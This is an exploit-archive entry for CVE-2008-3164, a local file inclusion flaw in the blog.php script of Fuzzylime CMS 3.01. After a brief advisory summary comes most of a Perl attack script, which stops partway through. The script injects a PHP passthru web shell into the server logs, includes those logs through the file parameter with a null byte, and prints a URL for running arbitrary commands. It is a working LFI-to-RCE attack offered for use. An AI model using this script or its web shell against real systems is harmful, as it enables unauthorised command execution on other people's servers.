Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion

Related Vulnerabilities: CVE-2008-3164  
Publish Date: 07 Jul 2008
Author: Cod3rZ
                source: http://www.securityfocus.com/bid/30121/info

'fuzzylime (cms)' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.

This issue affects fuzzylime (cms) 3.01a; other versions may also be affected. 

# Fuzzylime CMS 3.01 LFI / RCE
# author  : Cod3rZ
# website : http://cod3rz.helloweb.eu
# http://[site]/blog.php?file=../[file]\0
use LWP::UserAgent;
 print " -------------------------------------------------\n";
 print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";
 print " Insert Site (http://site.com/):                  \n ";
 chomp($site = <STDIN>);
 print " -------------------------------------------------\n";
 print " Insert Logs path                                 \n ";
 chomp($path = <STDIN>);
 print " -------------------------------------------------\n";
 #Infect Logs
 $lwp = LWP::UserAgent->new;
 $siten = $site.'/blog.php?file=';
 $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
 $ua = $lwp->get($site.$path.'%00');
 if($ua->content =~ m/cod3rz/) {
 print " Ok ".$site." is infected                         \n";
 print " -------------------------------------------------\n";
 print " ".$siten.$path."&cmd=[command]\\0                 \n";
 print " --